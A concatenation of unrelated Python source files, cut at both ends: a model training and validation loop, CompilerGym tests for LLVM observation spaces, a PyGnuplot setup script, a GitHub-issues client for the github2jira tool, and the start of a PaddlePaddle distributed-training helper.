optimizers :param epoch: index of epoch """ gamma = 0 for step in self.settings.step: if epoch + 1.0 > int(step): gamma += 1 lr = self.settings.lr * math.pow(0.1, gamma) self.lr = lr for param_group in self.optimizer.param_groups: param_group['lr'] = lr def train(self, epoch): """ Train one epoch for auxnet :param epoch: index of epoch """ top1_error = utils.AverageMeter() top1_loss = utils.AverageMeter() top5_error = utils.AverageMeter() iters = len(self.train_loader) self.update_lr(epoch) # Switch to train mode self.model.train() start_time = time.time() end_time = start_time for i, (images, labels) in enumerate(self.train_loader): start_time = time.time() data_time = start_time - end_time if self.settings.n_gpus == 1: images = images.cuda() labels = labels.cuda() # forward output, loss = self.forward(images, labels) self.backward(loss) # compute loss and error rate single_error, single_loss, single5_error = utils.compute_singlecrop_error( outputs=output, labels=labels, loss=loss, top5_flag=True) top1_error.update(single_error, images.size(0)) top1_loss.update(single_loss, images.size(0)) top5_error.update(single5_error, images.size(0)) end_time = time.time() iter_time = end_time - start_time if i % self.settings.print_frequency == 0: utils.print_result(epoch, self.settings.n_epochs, i + 1, iters, self.lr, data_time, iter_time, single_error, single_loss, mode="Train", logger=self.logger) if self.tensorboard_logger is not None: self.tensorboard_logger.scalar_summary('train_top1_error', top1_error.avg, self.run_count) self.tensorboard_logger.scalar_summary('train_top5_error', top5_error.avg, self.run_count) self.tensorboard_logger.scalar_summary('train_loss', top1_loss.avg, self.run_count) self.tensorboard_logger.scalar_summary("lr", self.lr, self.run_count) self.logger.info("|===>Training Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}" .format(top1_error.avg, top1_loss.avg, top5_error.avg)) return top1_error.avg, top1_loss.avg, top5_error.avg def val(self, epoch): """ Validation :param epoch: index of epoch """ top1_error = utils.AverageMeter() top1_loss = utils.AverageMeter() top5_error = utils.AverageMeter() self.model.eval() iters = len(self.val_loader) start_time = time.time() end_time = start_time with torch.no_grad(): for i, (images, labels) in enumerate(self.val_loader): start_time = time.time() data_time = start_time - end_time if self.settings.n_gpus == 1: images = images.cuda() labels = labels.cuda() output, loss = self.forward(images, labels) # compute loss and error rate single_error, single_loss, single5_error = utils.compute_singlecrop_error( outputs=output, labels=labels, loss=loss, top5_flag=True) top1_error.update(single_error, images.size(0)) top1_loss.update(single_loss, images.size(0)) top5_error.update(single5_error, images.size(0)) end_time = time.time() iter_time = end_time - start_time if i % self.settings.print_frequency == 0: utils.print_result(epoch, self.settings.n_epochs, i + 1, iters, self.lr, data_time, iter_time, single_error, single_loss, mode="Validation", logger=self.logger) if self.tensorboard_logger is not None: self.tensorboard_logger.scalar_summary("val_top1_error", top1_error.avg, self.run_count) self.tensorboard_logger.scalar_summary("val_top5_error", top5_error.avg, self.run_count) self.tensorboard_logger.scalar_summary("val_loss", top1_loss.avg, self.run_count) self.run_count += 1 self.logger.info("|===>Testing Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}" .format(top1_error.avg, top1_loss.avg, top5_error.avg)) return top1_error.avg, top1_loss.avg, top5_error.avg <filename>tests/llvm/observation_spaces_test.py # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. """Integrations tests for the LLVM CompilerGym environments.""" import os import sys from typing import Any, Dict, List import gym import networkx as nx import numpy as np import pytest from flaky import flaky from compiler_gym.envs.llvm.llvm_env import LlvmEnv from compiler_gym.spaces import Box from compiler_gym.spaces import Dict as DictSpace from compiler_gym.spaces import Scalar, Sequence from tests.pytest_plugins.common import ci_only from tests.test_main import main pytest_plugins = ["tests.pytest_plugins.llvm"] def test_default_observation_space(env: LlvmEnv): env.observation_space = "Autophase" assert env.observation_space.shape == (56,) assert env.observation_space_spec.id == "Autophase" env.observation_space = None assert env.observation_space is None assert env.observation_space_spec is None invalid = "invalid value" with pytest.raises(LookupError, match=f"Observation space not found: {invalid}"): env.observation_space = invalid def test_observation_spaces(env: LlvmEnv): env.reset("cbench-v1/crc32") assert set(env.observation.spaces.keys()) == { "Autophase", "AutophaseDict", "Bitcode", "BitcodeFile", "Buildtime", "CpuInfo", "Inst2vec", "Inst2vecEmbeddingIndices", "Inst2vecPreprocessedText", "InstCount", "InstCountDict", "InstCountNorm", "InstCountNormDict", "Ir", "IrInstructionCount", "IrInstructionCountO0", "IrInstructionCountO3", "IrInstructionCountOz", "IrSha1", "IsBuildable", "IsRunnable", "ObjectTextSizeBytes", "ObjectTextSizeO0", "ObjectTextSizeO3", "ObjectTextSizeOz", "Programl", "ProgramlJson", "Runtime", "TextSizeBytes", "TextSizeO0", "TextSizeO3", "TextSizeOz", } def test_ir_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Ir" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert space.space.dtype == str assert space.space.size_range == (0, np.iinfo(np.int64).max) value: str = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, str) assert space.space.contains(value) assert space.deterministic assert not space.platform_dependent def test_ir_sha1_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "IrSha1" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert space.space.dtype == str assert space.space.size_range == (40, 40) value: str = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, str) assert len(value) == 40 assert space.space.contains(value) assert space.deterministic assert not space.platform_dependent def test_bitcode_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Bitcode" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert space.space.dtype == np.int8 assert space.space.size_range == (0, np.iinfo(np.int64).max) assert space.deterministic assert not space.platform_dependent value: str = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, np.ndarray) assert value.dtype == np.int8 assert space.space.contains(value) def test_bitcode_file_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "BitcodeFile" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert space.space.dtype == str assert space.space.size_range == (0, 4096) assert not space.deterministic assert not space.platform_dependent value: str = env.observation[key] print(value) # For debugging in case of error. try: assert isinstance(value, str) assert os.path.isfile(value) assert space.space.contains(value) finally: os.unlink(value) @pytest.mark.parametrize( "benchmark_uri", ["cbench-v1/crc32", "cbench-v1/qsort", "cbench-v1/gsm"] ) def test_bitcode_file_equivalence(env: LlvmEnv, benchmark_uri: str): """Test that LLVM produces the same bitcode as a file and as a byte array.""" env.reset(benchmark=benchmark_uri) bitcode = env.observation.Bitcode() bitcode_file = env.observation.BitcodeFile() try: with open(bitcode_file, "rb") as f: bitcode_from_file = f.read() assert bitcode.tobytes() == bitcode_from_file finally: os.unlink(bitcode_file) # The Autophase feature vector for benchmark://cbench-v1/crc32 in its initial # state. AUTOPHASE_CBENCH_CRC32 = [ 0, 0, 16, 12, 2, 16, 8, 2, 4, 8, 0, 0, 0, 29, 0, 24, 9, 2, 32, 44, 41, 14, 36, 16, 13, 0, 5, 26, 3, 5, 24, 20, 24, 33, 5, 10, 3, 51, 0, 1, 0, 5, 0, 0, 0, 42, 0, 1, 8, 5, 29, 242, 157, 15, 0, 103, ] def test_autophase_observation_space_reset(env: LlvmEnv): """Test that the intial observation is returned on env.reset().""" env.observation_space = "Autophase" observation = env.reset("cbench-v1/crc32") print(observation.tolist()) # For debugging on error. np.testing.assert_array_equal(observation, AUTOPHASE_CBENCH_CRC32) def test_instcount_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "InstCount" space = env.observation.spaces[key] assert isinstance(space.space, Box) assert space.space.dtype == np.int64 assert space.space.shape == (70,) assert space.deterministic assert not space.platform_dependent value: np.ndarray = env.observation[key] print(value.tolist()) # For debugging in case of error. expected_values = [ 242, 29, 15, 5, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 3, 1, 8, 26, 51, 42, 5, 0, 0, 0, 1, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 10, 0, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ] np.testing.assert_array_equal(value, expected_values) assert value.dtype == np.int64 # The first value is the total number of instructions. This should equal the # number of instructions. assert sum(value[3:]) == value[0] def test_instcount_dict_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "InstCountDict" space = env.observation.spaces[key] assert isinstance(space.space, DictSpace) assert space.deterministic assert not space.platform_dependent value: Dict[str, int] = env.observation[key] print(value) # For debugging in case of error. assert len(value) == 70 def test_instcount_norm_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "InstCountNorm" space = env.observation.spaces[key] assert isinstance(space.space, Box) assert space.space.dtype == np.float32 assert space.space.shape == (69,) assert space.deterministic assert not space.platform_dependent value: np.ndarray = env.observation[key] print(value.tolist()) # For debugging in case of error. assert value.shape == (69,) assert value.dtype == np.float32 # Assert that the normalized instruction counts sum to 1. Note that the # first two features (#blocks and #funcs) must be excluded. assert pytest.approx(sum(value[2:]), 1.0) def test_instcount_norm_dict_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "InstCountNormDict" space = env.observation.spaces[key] assert isinstance(space.space, DictSpace) assert space.deterministic assert not space.platform_dependent value: Dict[str, int] = env.observation[key] print(value) # For debugging in case of error. assert len(value) == 69 def test_autophase_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Autophase" space = env.observation.spaces[key] assert isinstance(space.space, Box) value: np.ndarray = env.observation[key] print(value.tolist()) # For debugging in case of error. assert isinstance(value, np.ndarray) assert value.shape == (56,) assert space.deterministic assert not space.platform_dependent np.testing.assert_array_equal(value, AUTOPHASE_CBENCH_CRC32) assert space.space.contains(value) def test_autophase_dict_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "AutophaseDict" space = env.observation.spaces[key] assert isinstance(space.space, DictSpace) value: Dict[str, int] = env.observation[key] print(value) # For debugging in case of error. assert len(value) == 56 assert space.deterministic assert not space.platform_dependent def test_programl_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Programl" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) graph: nx.MultiDiGraph = env.observation[key] assert isinstance(graph, nx.MultiDiGraph) assert graph.number_of_nodes() == 512 assert graph.number_of_edges() == 907 assert graph.nodes[0] == { "block": 0, "function": 0, "text": "[external]", "type": 0, } assert space.deterministic assert not space.platform_dependent def test_programl_json_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "ProgramlJson" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) graph: Dict[str, Any] = env.observation[key] assert isinstance(graph, dict) def test_cpuinfo_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "CpuInfo" space = env.observation.spaces[key] assert isinstance(space.space, DictSpace) value: Dict[str, Any] = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, dict) # Test each expected key, removing it as we go. assert isinstance(value.pop("name"), str) assert isinstance(value.pop("cores_count"), int) assert isinstance(value.pop("l1i_cache_size"), int) assert isinstance(value.pop("l1i_cache_count"), int) assert isinstance(value.pop("l1d_cache_size"), int) assert isinstance(value.pop("l1d_cache_count"), int) assert isinstance(value.pop("l2_cache_size"), int) assert isinstance(value.pop("l2_cache_count"), int) assert isinstance(value.pop("l3_cache_size"), int) assert isinstance(value.pop("l3_cache_count"), int) assert isinstance(value.pop("l4_cache_size"), int) assert isinstance(value.pop("l4_cache_count"), int) # Anything left in the JSON dictionary now is an unexpected key. assert not value invalid = "invalid value" with pytest.raises(KeyError) as ctx: _ = env.observation[invalid] assert str(ctx.value) == f"'{invalid}'" assert space.deterministic assert space.platform_dependent @pytest.fixture def cbench_crc32_inst2vec_embedding_indices() -> List[int]: """The expected inst2vec embedding indices for cbench-v1/crc32.""" # The linux/macOS builds of clang produce slightly different bitcodes. if sys.platform.lower().startswith("linux"): return [ 8564, 8564, 8564, 8564, 5, 46, 46, 40, 8564, 13, 8, 8564, 1348, 178, 286, 214, 182, 235, 697, 1513, 192, 8564, 182, 182, 395, 1513, 2298, 8564, 289, 291, 3729, 3729, 8564, 178, 289, 289, 200, 1412, 1412, 8564, 3032, 180, 3032, 293, 3032, 205, 415, 205, 213, 8564, 8564, 8564, 204, 8564, 213, 215, 364, 364, 216, 8564, 216, 8564, 8564, 8564, 311, 634, 204, 8564, 415, 182, 640, 214, 182, 295, 675, 697, 1513, 192, 8564, 182, 182, 395, 1513, 214, 216, 8564, 8564, 8564, 634, 204, 8564, 213, 215, 415, 205, 216, 8564, 8564, 8564, 182, 961, 214, 415, 214, 364, 364, 216, 8564, 293, 3032, 180, 3032, 8564, 3032, 295, 257, 8564, 291, 178, 178, 200, 214, 180, 3032, 205, 216, 8564, 182, 977, 204, 8564, 182, 213, 235, 697, 1513, 192, 8564, 182, 182, 395, 1513, 214, 216, 8564, 182, 420, 214, 213, 8564, 200, 216, 8564, 182, 961, 180, 3032, 2298, 8564, 289, 8564, 289, 178, 178, 289, 311, 594, 311, 180, 3032, 180, 3032, 293, 3032, 364, 216, 8564, 295, 431, 311, 425, 204, 8564, 597, 8564, 594, 213, 8564, 295, 653, 311, 295, 634, 204, 8564, 182, 182, 597, 213, 8564, 216, 8564, 216, 8564, 295, 634, 612, 293, 3032, 180, 3032, 180, 3032, 257, 8564, 289, 289, 8564, 8564, 178, 178, 289, 364, 311, 594, 8564, 3032, 8564, 180, 3032, 180, 3032, 8564, 8564, 8564, 204, 8564, 8564, 8564, 364, 364, 216, 8564, 8564, 8564, 8564, 8564, 205, 216, 8564, 182, 182, 488, 204, 8564, 295, 597, 182, 640, 182, 540, 612, 8564, 216, 8564, 182, 640, 214, 216, 8564, 364, 364, 216, 8564, 180, 3032, 180, 3032, 8564, 3032, 295, 257, ] elif sys.platform.lower().startswith("darwin"): return [ 8564, 8564, 5, 46, 46, 40, 8564, 13, 8, 8564, 1348, 178, 286, 214, 182, 235, 697, 1513, 192, 8564, 182, 182, 395, 1513, 2298, 8564, 289, 291, 3729, 3729, 8564, 178, 289, 289, 200, 1412, 1412, 8564, 3032, 180, 3032, 293, 3032, 205, 415, 205, 213, 8564, 8564, 5666, 204, 8564, 213, 215, 364, 364, 216, 8564, 216, 8564, 5665, 8564, 311, 634, 204, 8564, 415, 182, 640, 214, 182, 295, 675, 697, 1513, 192, 8564, 182, 182, 395, 1513, 214, 216, 8564, 5665, 8564, 634, 204, 8564, 213, 215, 415, 205, 216, 8564, 5665, 8564, 182, 961, 214, 415, 214, 364, 364, 216, 8564, 293, 3032, 180, 3032, 8564, 3032, 295, 257, 8564, 291, 178, 178, 200, 214, 180, 3032, 205, 216, 8564, 182, 977, 204, 8564, 182, 213, 235, 697, 1513, 192, 8564, 182, 182, 395, 1513, 214, 216, 8564, 182, 420, 214, 213, 8564, 200, 216, 8564, 182, 961, 180, 3032, 2298, 8564, 289, 8564, 289, 178, 178, 289, 311, 594, 311, 180, 3032, 180, 3032, 293, 3032, 364, 216, 8564, 295, 431, 311, 425, 204, 8564, 597, 8564, 594, 213, 8564, 295, 653, 311, 295, 634, 204, 8564, 182, 182, 597, 213, 8564, 216, 8564, 216, 8564, 295, 634, 612, 293, 3032, 180, 3032, 180, 3032, 257, 8564, 289, 289, 8564, 8564, 178, 178, 289, 364, 311, 594, 8564, 3032, 8564, 180, 3032, 180, 3032, 8564, 8564, 5666, 204, 8564, 5391, 8564, 364, 364, 216, 8564, 5665, 8564, 5665, 8564, 205, 216, 8564, 182, 182, 488, 204, 8564, 295, 597, 182, 640, 182, 540, 612, 8564, 216, 8564, 182, 640, 214, 216, 8564, 364, 364, 216, 8564, 180, 3032, 180, 3032, 8564, 3032, 295, 257, ] else: raise NotImplementedError(f"Unknown platform: {sys.platform}") def test_inst2vec_preprocessed_observation_space( env: LlvmEnv, cbench_crc32_inst2vec_embedding_indices: List[int] ): env.reset("cbench-v1/crc32") key = "Inst2vecPreprocessedText" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) value: List[str] = env.observation[key] assert isinstance(value, list) for item, idx in zip(value, cbench_crc32_inst2vec_embedding_indices): assert isinstance(item, str) unk = env.inst2vec.vocab["!UNK"] indices = [env.inst2vec.vocab.get(item, unk) for item in value] print(indices) # For debugging in case of error. assert indices == cbench_crc32_inst2vec_embedding_indices assert space.deterministic assert not space.platform_dependent def test_inst2vec_embedding_indices_observation_space( env: LlvmEnv, cbench_crc32_inst2vec_embedding_indices: List[int] ): env.reset("cbench-v1/crc32") key = "Inst2vecEmbeddingIndices" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) value: List[int] = env.observation[key] print(value) # For debugging in case of error. print(value) assert isinstance(value, list) for item in value: assert isinstance(item, int) assert value == cbench_crc32_inst2vec_embedding_indices assert space.deterministic assert not space.platform_dependent def test_inst2vec_observation_space( env: LlvmEnv, cbench_crc32_inst2vec_embedding_indices: List[int] ): env.reset("cbench-v1/crc32") key = "Inst2vec" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) value: np.ndarray = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, np.ndarray) assert value.dtype == np.float32 height, width = value.shape assert width == len(env.inst2vec.embeddings[0]) assert height == len(cbench_crc32_inst2vec_embedding_indices) # Check a handful of values. np.testing.assert_array_almost_equal( value.tolist(), [ env.inst2vec.embeddings[idx] for idx in cbench_crc32_inst2vec_embedding_indices ], ) assert space.deterministic assert not space.platform_dependent def test_ir_instruction_count_observation_spaces(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "IrInstructionCount" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert not space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 242 key = "IrInstructionCountO0" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert not space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 242 key = "IrInstructionCountO3" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert not space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 164 key = "IrInstructionCountOz" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert not space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 114 def test_object_text_size_observation_spaces(env: LlvmEnv): env.reset("cbench-v1/crc32") # Expected .text sizes for this benchmark: -O0, -O3, -Oz. crc32_code_sizes = {"darwin": [1171, 3825, 3289], "linux": [1183, 3961, 3286]} key = "ObjectTextSizeBytes" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == crc32_code_sizes[sys.platform][0] key = "ObjectTextSizeO0" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == crc32_code_sizes[sys.platform][0] key = "ObjectTextSizeO3" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == crc32_code_sizes[sys.platform][1] key = "ObjectTextSizeOz" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == crc32_code_sizes[sys.platform][2] def test_text_size_observation_spaces(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "TextSizeBytes" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) key = "TextSizeO0" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value > 0 # Exact value is system dependent, see below. key = "TextSizeO3" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value > 0 # Exact value is system dependent, see below. key = "TextSizeOz" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value > 0 # Exact value is system dependent, see below. # NOTE(cummins): The exact values here depend on the system toolchain and # libraries, so only run this test on the GitHub CI runner environment where we # can hardcode the values. If this test starts to fail, it may be because the CI # runner environment has changed. @ci_only def test_text_size_observation_space_values(env: LlvmEnv): env.reset("cbench-v1/crc32") # Expected .text sizes for this benchmark: -O0, -O3, -Oz. crc32_code_sizes = {"darwin": [16384, 16384, 16384], "linux": [2850, 5652, 4980]} # For debugging in case of error. print(env.observation["TextSizeO0"]) print(env.observation["TextSizeO3"]) print(env.observation["TextSizeOz"]) assert env.observation.TextSizeO0() == crc32_code_sizes[sys.platform][0] assert env.observation.TextSizeO0() == crc32_code_sizes[sys.platform][0] assert env.observation.TextSizeO3() == crc32_code_sizes[sys.platform][1] assert env.observation.TextSizeOz() == crc32_code_sizes[sys.platform][2] @flaky # Runtimes can timeout def test_runtime_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Runtime" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) value: np.ndarray = env.observation[key] print(value.tolist()) # For debugging in case of error. assert isinstance(value, np.ndarray) assert env.runtime_observation_count == 1 assert value.shape == (1,) assert not space.deterministic assert space.platform_dependent assert space.space.contains(value) for buildtime in value: assert buildtime > 0 @flaky # Runtimes can timeout def test_runtime_observation_space_different_observation_count(env: LlvmEnv): """Test setting a custom observation count for LLVM runtimes.""" env.reset("cbench-v1/crc32") env.runtime_observation_count = 3 value: np.ndarray = env.observation["Runtime"] print(value.tolist()) # For debugging in case of error. assert value.shape == (3,) env.reset() value: np.ndarray = env.observation["Runtime"] print(value.tolist()) # For debugging in case of error. assert value.shape == (3,) env.runtime_observation_count = 5 value: np.ndarray = env.observation["Runtime"] print(value.tolist()) # For debugging in case of error. assert value.shape == (5,) @flaky # Runtimes can timeout def test_runtime_observation_space_invalid_observation_count(env: LlvmEnv): """Test setting an invalid custom observation count for LLVM runtimes.""" env.reset("cbench-v1/crc32") val = env.runtime_observation_count with pytest.raises( ValueError, match="runtimes_per_observation_count must be >= 1. Received: -5" ): env.runtime_observation_count = -5 assert env.runtime_observation_count == val # unchanged def test_runtime_observation_space_not_runnable(env: LlvmEnv): env.reset("chstone-v0/gsm") key = "Runtime" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert env.observation[key] is None @flaky # Build can timeout def test_buildtime_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Buildtime" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert not space.deterministic assert space.platform_dependent value: np.ndarray = env.observation[key] print(value) # For debugging in case of error. assert value.shape == (1,) assert space.space.contains(value) assert value[0] >= 0 def test_buildtime_observation_space_not_runnable(env: LlvmEnv): env.reset("chstone-v0/gsm") key = "Buildtime" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert not space.deterministic assert space.platform_dependent assert env.observation[key] is None def test_is_runnable_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "IsRunnable" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 1 def test_is_runnable_observation_space_not_runnable(env: LlvmEnv): env.reset("chstone-v0/gsm") key = "IsRunnable" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 0 def test_is_buildable_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "IsBuildable" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 1 def test_is_buildable_observation_space_not_buildable(env: LlvmEnv): env.reset("chstone-v0/gsm") key = "IsBuildable" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 0 def test_add_derived_space(env: LlvmEnv): env.reset() with pytest.deprecated_call( match="Use the derived_observation_spaces argument to CompilerEnv constructor." ): env.observation.add_derived_space( id="IrLen", base_id="Ir", space=Box(name="IrLen", low=0, high=float("inf"), shape=(1,), dtype=int), translate=lambda base: [15], ) value = env.observation["IrLen"] assert isinstance(value, list) assert value == [15] # Repeat the above test using the generated bound method. value = env.observation.IrLen() assert isinstance(value, list) assert value == [15] def test_derived_space_constructor(): """Test that derived observation space can be specified at construction time. """ with gym.make("llvm-v0") as env: env.observation_space = "AutophaseDict" a = env.reset() with gym.make("llvm-v0", observation_space="AutophaseDict") as env: b = env.reset() assert a == b if __name__ == "__main__": main() try: from setuptools import setup except ImportError: from distutils.core import setup with open('README.rst', 'r') as f: long_description = f.read() setup(name='PyGnuplot', py_modules=['PyGnuplot'], version='0.11.16', license='MIT', description='Python Gnuplot wrapper', long_description=long_description, author='<NAME>', author_email=' ', url='https://github.com/benschneider/PyGnuplot', download_url='https://github.com/benschneider/PyGnuplot/archive/0.11.16.tar.gz', keywords=['gnuplot', 'plot'], # install_requires=['numpy'], classifiers=["Topic :: Scientific/Engineering", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3.6", "Development Status :: 4 - Beta"], ) <filename>github2jira/githublib.py # This file is part of the github2jira project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Copyright 2021 Red Hat, Inc. # import time from datetime import datetime import requests from github2jira.config import Config SECONDS_PER_WEEK = 7 * 24 * 60 * 60 # max github pages to process GITHUB_MAX_PAGES = 20 # process upto x weeks back MAX_DELTA_WEEKS = 4 class GithubEnv: TOKEN = "GITHUB_TOKEN" OWNER = "GITHUB_OWNER" REPO = "GITHUB_REPO" LABEL = "GITHUB_LABEL" _ENV_VAR_NAMES = [GithubEnv.TOKEN, GithubEnv.OWNER, GithubEnv.REPO, GithubEnv.LABEL] def config(): c = Config(_ENV_VAR_NAMES) c.Load() return c class Issue: def __init__(self, issue): self._issue = issue @property def repo(self): return self._issue["html_url"].split("/")[4] @property def id(self): return self._issue["number"] @property def url(self): return self._issue["html_url"] @property def title(self): return self._issue["title"] @property def epoch(self): TIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ" timestamp = self._issue["created_at"] return int(datetime.strptime(timestamp, TIME_FORMAT).timestamp()) @property def raw_issue(self): return self._issue @property def labels(self): return [l["name"] for l in self._issue["labels"]] def __eq__(self, other): return self._issue == other._issue class Github: def __init__(self, cfg): owner = cfg.vars[GithubEnv.OWNER] repo = cfg.vars[GithubEnv.REPO] self.query_url = f"https://api.github.com/repos/{owner}/{repo}/issues" self.headers = {"Authorization": f"token {cfg.vars[GithubEnv.TOKEN]}"} self.expected_label = cfg.vars[GithubEnv.LABEL] def issue_by_id(self, issue_id): r = requests.get(f"{self.query_url}/{issue_id}", headers=self.headers) issue = r.json() if issue.get("url", None) is None: return None return Issue(issue) def issues(self): return self._filter(self._open_issues()) def _filter(self, issues): for issue in issues: if "pull" in issue.url: continue if ( self.expected_label == "" or self.expected_label in issue.labels ) and issue_in_time_window(issue, MAX_DELTA_WEEKS): yield issue def _open_issues(self): for page in range(1, GITHUB_MAX_PAGES): params = {"state": "open", "page": page, "per_page": "100"} r = requests.get(self.query_url, headers=self.headers, params=params) issues = r.json() if len(issues) == 0: return for issue in issues: yield Issue(issue) def issue_in_time_window(issue, max_delta_weeks): epoch = issue.epoch epoch_time_now = int(time.time()) return (epoch_time_now - epoch) < (max_delta_weeks * SECONDS_PER_WEEK) # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import os import sys import warnings import logging import numpy as np import time import paddle import paddle.fluid as fluid import paddle.distributed.fleet.base.role_maker as role_maker import paddle.distributed.fleet as fleet __dir__ = os.path.dirname(os.path.abspath(__file__)) sys.path.append(__dir__) import common logging.basicConfig( format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) def get_avg_cost_mins(value): t1 = time.time() local_cost = np.array([value]) global_cost = np.copy(local_cost) * 0 t2 = time.time() #fleet._role_maker._node_type_comm.Allreduce(local_cost, global_cost) global_cost = fleet.util.all_reduce(local_cost) t3 = time.time() avg_cost = float(global_cost[0]) / fleet.worker_num() avg_cost /= 60.0 t4 = time.time() tc = (t2 - t1 + t4 - t3) / 60.0 tb = (t3 - t2) / 60.0 logger.info("get_avg_cost_mins calc time %f barrier time %f" % (tc, tb)) return avg_cost def get_max_cost_mins(value): #from mpi4py import MPI local_cost = np.array([value]) global_cost = np.copy(local_cost) * 0 #fleet._role_maker._node_type_comm.Allreduce(local_cost, global_cost, op=MPI.MAX) global_cost = 